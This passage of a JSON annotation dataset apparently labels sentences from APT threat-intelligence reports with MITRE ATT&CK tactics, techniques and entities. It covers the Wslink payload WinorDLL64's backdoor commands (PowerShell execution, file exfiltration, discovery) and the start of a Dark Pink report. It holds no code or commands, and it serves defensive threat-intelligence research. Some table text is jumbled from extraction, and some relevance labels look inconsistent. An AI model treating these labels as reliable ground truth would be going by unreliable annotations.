"sentence_id": 27, "context_before": "The loader is virtualized by Oreans’ Code Virtualizer, which is a commercial protector that is used frequently by Lazarus.", "sentence_text": "The loader uses the MemoryModule library to load modules directly from memory.", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": [ { "name": "Reflective Code Loading", "id": "T1620" } ], "procedure": "The loader uses a library to load modules directly from memory.", "entities": [ { "text": "uses the MemoryModule library to load modules directly from memory", "start": 11, "end": 77, "label": "Action" }, { "text": "MemoryModule", "start": 20, "end": 32, "label": "MalwareTool" } ] }, { "uid": "aptnotes-07_aptnotes_report-p3-s28-081270", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 3, "sentence_id": 28, "context_before": "The loader uses the MemoryModule library to load modules directly from memory.", "sentence_text": "The library is not commonly used by malware, but it is quite popular among North Korea- aligned groups such as Lazarus and Kimsuky.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p3-s29-e8b9d9", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 3, "sentence_id": 29, "context_before": "The library is not commonly used by malware, but it is quite popular among North Korea- aligned groups such as Lazarus and Kimsuky.", "sentence_text": "Overlap in the code between WinorDLL64 and GhostSecret that we found during our analysis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p3-s30-194c66", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 3, "sentence_id": 30, "context_before": "Overlap in the code between WinorDLL64 and GhostSecret that we found during our analysis.", "sentence_text": "The results and the significance in attribution are listed in Table 1.\nattributing both to the same threat actor Other similarities between WinorDLL64 and GhostSecret Impact Code overlap in code responsible to get processor architecture Low 3/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p4-s31-98b765", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 4, "sentence_id": 31, "context_before": "The results and the significance in attribution are listed in Table 1.\nattributing both to the same threat actor Other similarities between WinorDLL64 and GhostSecret Impact Code overlap in code responsible to get processor architecture Low 3/11", "sentence_text": "Other similarities between WinorDLL64 and GhostSecret Impact Code overlap in current directory manipulation Low Code overlap in getting the process list Low Code overlap in file sending Low Behavior overlap in listing processes Low Behavior overlap in current directory manipulation Low Behavior overlap in file and directory listing Low Behavior overlap in listing volumes Low Behavior overlap in reading/writing files Low Behavior overlap in creating processes Low Considerable behavior overlap in secure removal of files Low Considerable behavior overlap in termination of processes Low Considerable behavior overlap in collecting system information Low Code overlap in the file sending functionality is highlighted in Figure 2 and Figure 3.\n4/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p5-s32-627f1e", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 5, "sentence_id": 32, "context_before": "Other similarities between WinorDLL64 and GhostSecret Impact Code overlap in current directory manipulation Low Code overlap in getting the process list Low Code overlap in file sending Low Behavior overlap in listing processes Low Behavior overlap in current directory manipulation Low Behavior overlap in file and directory listing Low Behavior overlap in listing volumes Low Behavior overlap in reading/writing files Low Behavior overlap in creating processes Low Considerable behavior overlap in secure removal of files Low Considerable behavior overlap in termination of processes Low Considerable behavior overlap in collecting system information Low Code overlap in the file sending functionality is highlighted in Figure 2 and Figure 3.\n4/11", "sentence_text": "Interestingly, it communicates over a TCP connection that was already established by its loader and uses some of the loader’s functions.\n5/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p6-s33-69f361", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 6, "sentence_id": 33, "context_before": "Interestingly, it communicates over a TCP connection that was already established by its loader and uses some of the loader’s functions.\n5/11", "sentence_text": "The backdoor is a DLL with a single unnamed export that accepts one parameter – a structure for communication that was already described in our previous blogpost.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p6-s34-f3e843", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 6, "sentence_id": 34, "context_before": "The backdoor is a DLL with a single unnamed export that accepts one parameter – a structure for communication that was already described in our previous blogpost.", "sentence_text": "The structure contains a TLS-context – socket, key, IV – and callbacks for sending and receiving messages encrypted with 256-bit AES-CBC that enable WinorDLL64 to exchange data securely with the operator over an already established connection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p6-s35-64df66", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 6, "sentence_id": 35, "context_before": "The structure contains a TLS-context – socket, key, IV – and callbacks for sending and receiving messages encrypted with 256-bit AES-CBC that enable WinorDLL64 to exchange data securely with the operator over an already established connection.", "sentence_text": "The name of the DLL is WinorDLL64.dll and Wslink’s name was WinorLoaderDLL64.dll.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p6-s36-10e862", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 6, "sentence_id": 36, "context_before": "The name of the DLL is WinorDLL64.dll and Wslink’s name was WinorLoaderDLL64.dll.", "sentence_text": "WinorDLL64 accepts several commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p6-s37-8beb44", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 6, "sentence_id": 37, "context_before": "WinorDLL64 accepts several commands.", "sentence_text": "Each command is bound to a unique ID and accepts a configuration that contains additional parameters.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p7-s39-6847ba", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 7, "sentence_id": 39, "context_before": "6/11", "sentence_text": "We highlight only significant changes in the modified category.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p7-s40-24ab76", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 7, "sentence_id": 40, "context_before": "We highlight only significant changes in the modified category.", "sentence_text": "Command\nCategory ID Functionality Description 7/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p8-s41-c694c5", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 41, "context_before": "Command Category ID Functionality Description 7/11", "sentence_text": "Command Category ID Functionality Description New 0x03 Execute a WinorDLL64 instructs the PowerShell interpreter to run unrestricted and to read commands from standard input.", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": [ { "name": "Command and Scripting Interpreter: PowerShell", "id": "T1059.001" } ], "procedure": "WinorDLL64 instructs the PowerShell interpreter to run and read commands from standard input.", "entities": [ { "text": "instructs the PowerShell interpreter to run unrestricted", "start": 76, "end": 132, "label": "Action" }, { "text": "read commands from standard input", "start": 140, "end": 173, "label": "Action" }, { "text": "PowerShell", "start": 90, "end": 100, "label": "MalwareTool" } ] }, { "uid": "aptnotes-07_aptnotes_report-p8-s42-8918ee", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 42, "context_before": "Command\nCategory ID Functionality Description New 0x03 Execute a WinorDLL64 instructs the PowerShell interpreter PowerShell to run unrestricted and to read commands from command standard input.", "sentence_text": "Afterwards, the backdoor passes the specified command to the interpreter and sends the output to the operator.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Backdoor forwards commands to an interpreter for execution and returns the output to the operator.", "entities": [ { "text": "the backdoor", "start": 12, "end": 24, "label": "MalwareTool" }, { "text": "passes the specified command to the interpreter", "start": 25, "end": 72, "label": "Action" }, { "text": "sends the output to the operator", "start": 77, "end": 109, "label": "Action" }, { "text": "the operator", "start": 97, "end": 109, "label": "ThreatActor" } ] }, { "uid": "aptnotes-07_aptnotes_report-p8-s43-21c26b", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 43, "context_before": "Afterwards, the backdoor passes the specified command to the interpreter and sends the output to the operator.", "sentence_text": "0x09 Compress WinorDLL64 recursively iterates over a specified and download directory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p8-s44-975696", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 44, "context_before": "0x09 Compress WinorDLL64 recursively iterates over a specified and download directory.", "sentence_text": "The content of each file and directory is a directory compressed separately and written to a temporary file that is afterwards sent to the operator and then removed securely.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1560", "name": "Archive Collected Data" }, { "id": "T1070.004", "name": "Indicator Removal on Host: File Deletion" } ], "procedure": "Compress files and directories into temporary files, send them to the operator, and securely delete the files afterward.", "entities": [ { "text": "compressed separately and written to a temporary file", "start": 54, "end": 107, "label": "Action" }, { "text": "sent to the operator", "start": 127, "end": 147, "label": "Action" }, { "text": "removed securely", "start": 157, "end": 173, "label": "Action" }, { "text": "a temporary file", "start": 91, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "the operator", "start": 135, "end": 147, "label": "ThreatActor" } ] }, { "uid": "aptnotes-07_aptnotes_report-p8-s46-9adb76", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 46, "context_before": "0x0D", "sentence_text": "Disconnect a Disconnects a specified logged-on user from the session user’s Remote Desktop Services session.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p8-s47-e7064c", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 47, "context_before": "Disconnect a Disconnects a specified logged-on user from the session user’s Remote Desktop Services session.", "sentence_text": "The command can also perform different functionality based on the parameter.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p8-s49-5fa0b4", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 49, "context_before": "0x0D", "sentence_text": "List sessions Acquires various details about all sessions on the victim’s device and sends them to the operator.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p8-s50-8ed9cc", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 50, "context_before": "List sessions Acquires various details about all sessions on the victim’s device and sends them to the operator.", "sentence_text": "The command can also perform different functionality based on the parameter.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p8-s51-f27afb", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 51, "context_before": "0x05 Set/Get Attempts to set and subsequently acquire the current path of the current working directory.", "sentence_text": "0x0E Measure Uses the Windows API GetTickCount to measure connection the time required to connect to a specified host.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p8-s52-b2f4b9", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 52, "context_before": "0x0E Measure Uses the Windows API GetTickCount to measure connection the time required to connect to a specified host.", "sentence_text": "time\nModified 0x01 Get system Acquires comprehensive details about the victim’s info system and sends them to the operator.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p8-s55-998323", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 55, "context_before": "0x0C", "sentence_text": "Kill processes Terminates all processes whose names match a supplied pattern and/or with a specific PID.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p8-s56-93bd9a", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 56, "context_before": "Kill processes Terminates all processes whose names match a supplied pattern and/or with a specific PID.", "sentence_text": "Old 0x02/0x0B Create a Creates a process either as the current or process specified user and optionally sends its output to the operator.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p8-s57-9aba94", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 57, "context_before": "Old 0x02/0x0B Create a Creates a process either as the current or process specified user and optionally sends its output to the operator.", "sentence_text": "0x05 Set/Get Attempts to set and subsequently acquire the current path of the current working directory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p8-s58-bcc77a", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 58, "context_before": "0x05 Set/Get Attempts to set and subsequently acquire the current path of the current working directory.", "sentence_text": "directory\n0x06 List volumes Iterates over drives from C: to Z: and acquires the drive type and volume name.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p8-s59-32ccc3", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 8, "sentence_id": 59, "context_before": "directory\n0x06 List volumes Iterates over drives from C: to Z: and acquires the drive type and volume name.", "sentence_text": "The command can also perform different functionality based on the parameter.\n8/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p9-s60-64489a", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 9, "sentence_id": 60, "context_before": "The command can also perform different functionality based on the parameter.\n8/11", "sentence_text": "The command can also perform different functionality based on the parameter.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p9-s61-2b4560", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 9, "sentence_id": 61, "context_before": "The command can also perform different functionality based on the parameter.", "sentence_text": "0x07 Write to a file Downloads and appends the stated amount of data to specified file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p9-s62-d9ee7d", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 9, "sentence_id": 62, "context_before": "0x07 Write to a file Downloads and appends the stated amount of data to specified file.", "sentence_text": "0x08 Read from a The specified file is read and sent to the operator.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p9-s64-2c9ac9", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 9, "sentence_id": 64, "context_before": "file\n0x0C", "sentence_text": "List Acquires details about all running processes on processes the victim’s device and additionally sends ID of the current process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p9-s65-bc372f", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 9, "sentence_id": 65, "context_before": "List Acquires details about all running processes on processes the victim’s device and additionally sends ID of the current process.", "sentence_text": "Conclusion\nWslink’s payload is dedicated to providing means for file manipulation, execution of further code, and obtaining extensive information about the underlying system that possibly can be leveraged later for lateral movement, due to specific interest in network sessions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p9-s66-d2a3ab", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 9, "sentence_id": 66, "context_before": "Conclusion\nWslink’s payload is dedicated to providing means for file manipulation, execution of further code, and obtaining extensive information about the underlying system that possibly can be leveraged later for lateral movement, due to specific interest in network sessions.", "sentence_text": "The Wslink loader listens on a port specified in the configuration and can serve additional connecting clients, and even load various payloads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p9-s67-255568", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 9, "sentence_id": 67, "context_before": "The Wslink loader listens on a port specified in the configuration and can serve additional connecting clients, and even load various payloads.", "sentence_text": "ESET Research offers private APT intelligence reports and data feeds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p9-s68-0717f8", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 9, "sentence_id": 68, "context_before": "ESET Research offers private APT intelligence reports and data feeds.", "sentence_text": "For any inquiries about this service, visit the ESET Threat Intelligence page.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p9-s69-018230", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 9, "sentence_id": 69, "context_before": "For any inquiries about this service, visit the ESET Threat Intelligence page.", "sentence_text": "IoCs\nSHA-1 ESET detection name Description 1BA443FDE984CEE85EBD4D4FA7EB1263A6F1257F Win64/Wslink.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p9-s70-d6aeea", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 9, "sentence_id": 70, "context_before": "IoCs\nSHA-1 ESET detection name Description 1BA443FDE984CEE85EBD4D4FA7EB1263A6F1257F Win64/Wslink.", "sentence_text": "A Memory dump of discovered Wslink payload WinorDll64.\nMITRE ATT&CK techniques 9/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p10-s71-72f759", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 10, "sentence_id": 71, "context_before": "A Memory dump of discovered Wslink payload WinorDll64.\nMITRE ATT&CK techniques 9/11", "sentence_text": "This table was built using version 12 of the ATT&CK framework.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p10-s72-fb720e", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 10, "sentence_id": 72, "context_before": "This table was built using version 12 of the ATT&CK framework.", "sentence_text": "We do not mention techniques from the loader again, only the payload.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p10-s73-c28649", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 10, "sentence_id": 73, "context_before": "We do not mention techniques from the loader again, only the payload.", "sentence_text": "Tactic ID Name Description Resource T1587.001 Develop WinorDLL64 is a custom tool.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p10-s74-8341ab", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 10, "sentence_id": 74, "context_before": "Tactic ID Name Description Resource T1587.001 Develop WinorDLL64 is a custom tool.", "sentence_text": "Development Capabilities:\nMalware\nExecution T1059.001 Command WinorDLL64 can execute arbitrary PowerShell and Scripting commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p10-s75-a17179", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 10, "sentence_id": 75, "context_before": "Development Capabilities:\nMalware\nExecution T1059.001 Command WinorDLL64 can execute arbitrary PowerShell and Scripting commands.", "sentence_text": "Interpreter:\nPowerShell\nT1106 Native API WinorDLL64 can execute further processes using the CreateProcessW and CreateProcessAsUserW APIs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p10-s76-bed418", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 10, "sentence_id": 76, "context_before": "Interpreter:\nPowerShell\nT1106 Native API WinorDLL64 can execute further processes using the CreateProcessW and CreateProcessAsUserW APIs.", "sentence_text": "Defense T1134.002 Access Token WinorDLL64 can call APIs Evasion Manipulation: WTSQueryUserToken and Create CreateProcessAsUserW to create a process Process with under an impersonated user.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p10-s77-d43f86", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 10, "sentence_id": 77, "context_before": "Defense T1134.002 Access Token WinorDLL64 can call APIs Evasion Manipulation: WTSQueryUserToken and Create CreateProcessAsUserW to create a process Process with under an impersonated user.", "sentence_text": "Token\nT1070.004 Indicator WinorDLL64 can securely remove arbitrary Removal: File files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p10-s78-f7753e", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 10, "sentence_id": 78, "context_before": "Token\nT1070.004 Indicator WinorDLL64 can securely remove arbitrary Removal: File files.", "sentence_text": "Deletion\nDiscovery T1087.001 Account WinorDLL64 can enumerate sessions and list Discovery: associated user, and client names, among Local other details.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p10-s79-a9162c", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 10, "sentence_id": 79, "context_before": "Deletion\nDiscovery T1087.001 Account WinorDLL64 can enumerate sessions and list Discovery: associated user, and client names, among Local other details.", "sentence_text": "Account\nT1087.002 Account WinorDLL64 can enumerate sessions and list Discovery: associated domain names –among other Domain details.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p10-s80-678e09", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 10, "sentence_id": 80, "context_before": "Account\nT1087.002 Account WinorDLL64 can enumerate sessions and list Discovery: associated domain names –among other Domain details.", "sentence_text": "Account\nT1083 File and WinorDLL64 can obtain file and directory Directory listings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p10-s81-6d5aa6", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 10, "sentence_id": 81, "context_before": "Account\nT1083 File and WinorDLL64 can obtain file and directory Directory listings.", "sentence_text": "Discovery\nT1135 Network WinorDLL64 can discover shared network Share drives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p10-s82-675219", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 10, "sentence_id": 82, "context_before": "Discovery\nT1135 Network WinorDLL64 can discover shared network Share drives.", "sentence_text": "Discovery\nT1057 Process WinorDLL64 can collect information about Discovery running processes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p10-s83-abd451", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 10, "sentence_id": 83, "context_before": "Discovery\nT1057 Process WinorDLL64 can collect information about Discovery running processes.", "sentence_text": "T1012 Query WinorDLL64 can query the Windows registry Registry to gather system information.\n10/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p11-s84-c246a4", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 11, "sentence_id": 84, "context_before": "T1012 Query WinorDLL64 can query the Windows registry Registry to gather system information.\n10/11", "sentence_text": "Tactic ID Name Description T1082 System WinorDLL64 can obtain information such as Information computer name, OS and latest service pack Discovery version, processor architecture, processor name, and amount of space on fixed drives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p11-s85-0e379f", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 11, "sentence_id": 85, "context_before": "Tactic ID Name Description T1082 System WinorDLL64 can obtain information such as Information computer name, OS and latest service pack Discovery version, processor architecture, processor name, and amount of space on fixed drives.", "sentence_text": "T1614 System WinorDLL64 can obtain the victim’s default Location country name using the GetLocaleInfoW API.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p11-s86-8532d2", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 11, "sentence_id": 86, "context_before": "T1614 System WinorDLL64 can obtain the victim’s default Location country name using the GetLocaleInfoW API.", "sentence_text": "Discovery\nT1614.001 System WinorDLL64 can obtain the victim’s default Location language using the GetLocaleInfoW API.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p11-s87-15a03b", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 11, "sentence_id": 87, "context_before": "Discovery:\nSystem\nLanguage\nDiscovery\nT1614.001 System WinorDLL64 can obtain the victim’s default Location language using the GetLocaleInfoW API.", "sentence_text": "Discovery:\nSystem\nLanguage\nDiscovery\nT1016 System WinorDLL64 can enumerate network adapter Network information.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p11-s88-ae872e", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 11, "sentence_id": 88, "context_before": "Discovery:\nSystem\nLanguage\nDiscovery\nT1016 System WinorDLL64 can enumerate network adapter Network information.", "sentence_text": "Configuration\nDiscovery\nT1049 System WinorDLL64 can collect a list of listening Network ports.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p11-s89-25227b", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 11, "sentence_id": 89, "context_before": "Configuration\nDiscovery\nT1049 System WinorDLL64 can collect a list of listening Network ports.", "sentence_text": "Connections\nDiscovery\nT1033 System WinorDLL64 can enumerate sessions and list Owner/User associated user, domain, and client names – Discovery among other details.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p11-s90-793bca", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 11, "sentence_id": 90, "context_before": "Connections\nDiscovery\nT1033 System WinorDLL64 can enumerate sessions and list Owner/User associated user, domain, and client names – Discovery among other details.", "sentence_text": "Collection T1560.002 Archive WinorDLL64 can compress and exfiltrate Collected directories using the quicklz library.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p11-s91-a614ea", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 11, "sentence_id": 91, "context_before": "Collection T1560.002 Archive WinorDLL64 can compress and exfiltrate Collected directories using the quicklz library.", "sentence_text": "Data: Archive\nvia Library\nT1005 Data from WinorDLL64 can collect data on the victim’s Local System device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p11-s92-717093", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 11, "sentence_id": 92, "context_before": "Data: Archive\nvia Library\nT1005 Data from WinorDLL64 can collect data on the victim’s Local System device.", "sentence_text": "Impact T1531 Account WinorDLL64 can disconnect a logged-on user Access from specified sessions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p1-s1-7d7fd6", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "Dark Pink\ngroup-ib.com/blog/dark-pink-apt\nAcknowledgements\nWe would like to specifically thank Albert Priego, Malware Analyst at Group-IB, for discovering the first Dark Pink attacks and for conducting the initial research into this particular threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p1-s2-f733a2", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "Dark Pink\ngroup-ib.com/blog/dark-pink-apt\nAcknowledgements\nWe would like to specifically thank Albert Priego, Malware Analyst at Group-IB, for discovering the first Dark Pink attacks and for conducting the initial research into this particular threat actor.", "sentence_text": "His efforts made a major contribution to this blog and for our future research into this APT group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p1-s3-34fa82", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "His efforts made a major contribution to this blog and for our future research into this APT group.", "sentence_text": "Introduction\nCountries of the Asia-Pacific region have long been the target of advanced persistent threat (APT) groups.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p1-s4-bdae26", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "Introduction\nCountries of the Asia-Pacific region have long been the target of advanced persistent threat (APT) groups.", "sentence_text": "Enter Dark Pink.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p1-s5-409f7a", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "Enter Dark Pink.", "sentence_text": "Dark Pink is the name given by Group-IB to a new wave of APT attacks that has struck the APAC region.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p1-s6-d8152c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "Dark Pink is the name given by Group-IB to a new wave of APT attacks that has struck the APAC region.", "sentence_text": "Bearing this in mind, we will refer to Dark Pink as an APT group throughout the entirety of this text.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, 